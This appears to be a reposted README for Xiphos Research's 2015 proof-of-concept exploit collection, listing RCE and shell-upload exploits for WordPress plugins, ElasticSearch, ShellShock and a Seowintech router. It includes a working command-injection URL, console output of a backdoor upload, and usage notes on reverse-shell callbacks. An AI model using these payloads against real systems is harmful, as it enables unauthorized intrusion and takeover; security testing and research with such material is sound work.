Changelog and tool added 25/04/2015:
+ WPsh0pwn – WordPress WPShop eCommerce Shell Upload (WPVDB-7830)
+ nmediapwn – WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
+ pwnflow – WordPress Work the flow file upload 2.5.2 Shell Upload
+ delusions – WordPress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446)
Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution.
Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 27.04.2015 :
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ IISlap – http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)
+ se0wned – Seowintech Router diagnostic.cgi remote root
+ WPsh0pwn – WordPress WPShop eCommerce Shell Upload (WPVDB-7830)
+ nmediapwn – WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
+ pwnflow – WordPress Work the flow file upload 2.5.2 Shell Upload
+ delusions – WordPress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446)
+ TBA
There is no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly
::Exploit for Seowintech Routers diagnostic.cgi Unauthenticated Remote Root Code Execution::
This is an exploit for an old bug, found the exploit code lurking around in one of my old hard drives, cleaned it up, and decided to release it. Basically, a long while back, a rather interesting exploit was disclosed which affected ALL Seowontech devices. Technically, it is two exploits. A remote root command injection bug, and a remote root file disclosure bug. In this, I only bother with the command injection bug. These vulnerabilities were found by one Todor Donev.
The bug we are abusing is quite simple. Like many router bugs, it exists in a CGI script, that is used for network diagnostics. It is the bit for pinging that is vulnerable to our abuse.
PoC:
http://target.com/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;id;&ping_count=1&action=Apply&html_view=ping
Usage:
To use, simply specify the target routers base URL, and a MIPS executable to upload and execute.
Trojans~Princes$ python2 /tmp/se0wn.py
███████╗███████╗ ██████╗ ██╗ ██╗███╗ ██╗███████╗██████╗
██╔════╝██╔════╝██╔═████╗██║ ██║████╗ ██║██╔════╝██╔══██╗
███████╗█████╗ ██║██╔██║██║ █╗ ██║██╔██╗ ██║█████╗ ██║ ██║
╚════██║██╔══╝ ████╔╝██║██║███╗██║██║╚██╗██║██╔══╝ ██║ ██║
███████║███████╗╚██████╔╝╚███╔███╔╝██║ ╚████║███████╗██████╔╝
╚══════╝╚══════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═════╝
Exploit for Seowintech Routers, CVE-?. Version: 20150425.1
{+} Uploading our backdoor...
{*} Backdoor is in 237 chunks...
100% |#########################################################################################################################################################################################|
{+} Setting execute bit...
{+} Executing Payload...InfusionSoft Gravity Forms Shell Upload
This is an exploit for one of the most facepalmworthy exploits ever, hence, I had to add it to the reportoire. Just… Just read the advisory. You will die laughing.
Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Exploit for WordPress WPshop eCommerce 1.3.9.5 Shell Upload.
This is an exploit for a trivial shell upload vulnerability in the WPshop eCommerce plugin in versions 1.3.9.5 and below. Its a very trivial shell upload in “ajax.php”, preauth, that we use to upload a shell and then spawn a reverse connect shell. Nothing fancy, only reason I bothered writing an exploit for it is because I didn’t want to use Metasploit and happened to have use for it.
Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Exploit for WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload
This plugin comes with added backdoor upload features, so naturally, I had to quickly knock together an exploit for it. Basically another trivial shell upload, trying to burn through a few of these so I have non-MSF exploits for when needed.
Usage :
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Exploit for WordPress Work the flow file upload 2.5.2 Shell Upload
This plugin comes with added backdoor upload features, so naturally, I had to quickly knock together an exploit for it. Basically another trivial shell upload, trying to burn through a few of these so I have non-MSF exploits for when needed.
Usage :
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable WordPress installation.
Usage Global SCript:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.
Download : Master.zip | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/